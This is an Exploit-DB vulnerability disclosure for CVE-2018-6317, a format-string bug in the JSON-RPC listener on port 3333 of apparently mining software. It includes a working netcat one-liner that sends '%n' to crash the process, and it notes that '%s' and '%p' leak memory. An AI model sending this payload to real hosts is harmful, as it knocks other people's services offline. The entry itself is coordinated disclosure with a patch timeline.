EDB-ID: 43972 | Author: res1n | Published: 2018-02-05 | CVE: CVE-2018-6317 | Type: Dos | Platform: Multiple | Aliases: N/A | Advisory/Source: Link | Tags: N/A | Vulnerable App: N/A |
After reading about the recent vulnerabilities with previous versions, I thought I should take another look at the json listener on port 3333 and see if there was any avenues of attack.
echo -e '{"id":1,"jsonrpc":"1.0","method":"test"}' | nc 192.168.1.107 3333 & printf "\n"
After realizing the buffer was printed I decided to try a few others…
Sending %s does return some strings, however I couldn’t get the hex addresses padded properly to dig in more as I kept getting unable to parse json errors. Sending %p also did yield some results but I’m sure someone more qualified may be able to exploit the stack further…
Finally, sending %n completely kills the mining process.
echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 192.168.1.139 3333 & printf "\n"
Keep your rigs up to date, or stop opening port 3333 to the public. Seriously.
Timeline
01/26/18 — Reported
01/26/18 —Confirmed and immediately patched. 10.6 released request for 3–4 day embargo
01/31/18 — Public Disclosure
